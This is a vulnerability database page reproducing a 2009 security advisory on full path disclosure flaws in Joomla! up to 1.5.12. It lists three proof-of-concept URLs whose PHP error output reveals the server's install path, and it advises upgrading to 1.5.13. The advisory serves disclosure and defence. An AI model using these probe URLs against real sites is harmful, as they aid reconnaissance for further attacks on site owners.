Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22210
HistoryJul 24, 2009 - 12:00 a.m.

[ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities

2009-07-2400:00:00
vulners.com
106
JSON

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-009

  • Original release date: July 21st, 2009
  • Last revised: July 23rd, 2009
  • Discovered by: Juan Galiana Lara
  • Severity: 5/10 (CVSS Base Score)
    =============================================

I. VULNERABILITY

Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities

II. BACKGROUND

Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.

III. DESCRIPTION

This vulnerability could allow a malicious user to view the internal
path information of the host due to some files were missing the check
for JEXEC.

IV. PROOF OF CONCEPT

The attacker can get the full path of the instalation of Joomla!
browsing to any of this urls:

http://example.com/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php
http://example.com/joomla-1.5.12/libraries/joomla/client/ldap.php
http://example.com/joomla-1.5.12/libraries/joomla/html/html/content.php

The information obtained contais the full path to the files:

<b>Parse error</b>: syntax error, unexpected T_CLONE, expecting
T_STRING in
<b>/var/www/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php</b>
on line <b>100</b><br />
<b>Fatal error</b>: Class 'JObject' not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/client/ldap.php</b> on line
<b>21</b><br />
<b>Fatal error</b>: Class 'JLoader' not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/html/html/content.php</b>
on line <b>15</b><br />

V. BUSINESS IMPACT

Full path disclosure vulnerabilities enables an attacker to know the
path to the web root. This information can be used in order to launch
further attacks.

VI. SYSTEMS AFFECTED

Joomla! versions prior and including 1.5.12 are vulnerable.

VII. SOLUTION

Upgrade to version 1.5.13

VIII. REFERENCES

http://www.joomla.org
http://www.isecauditors.com

IX. CREDITS

This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY

July 21, 2009: Initial release.
July 23, 2009: Last revision.

XI. DISCLOSURE TIMELINE

July 21, 2009: Discovered by Internet Security Auditors.
July 21, 2009: Vendor contacted.
July 22, 2009: Joomla! publish update. Great job.
July 24, 2009: Advisory published.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

JSON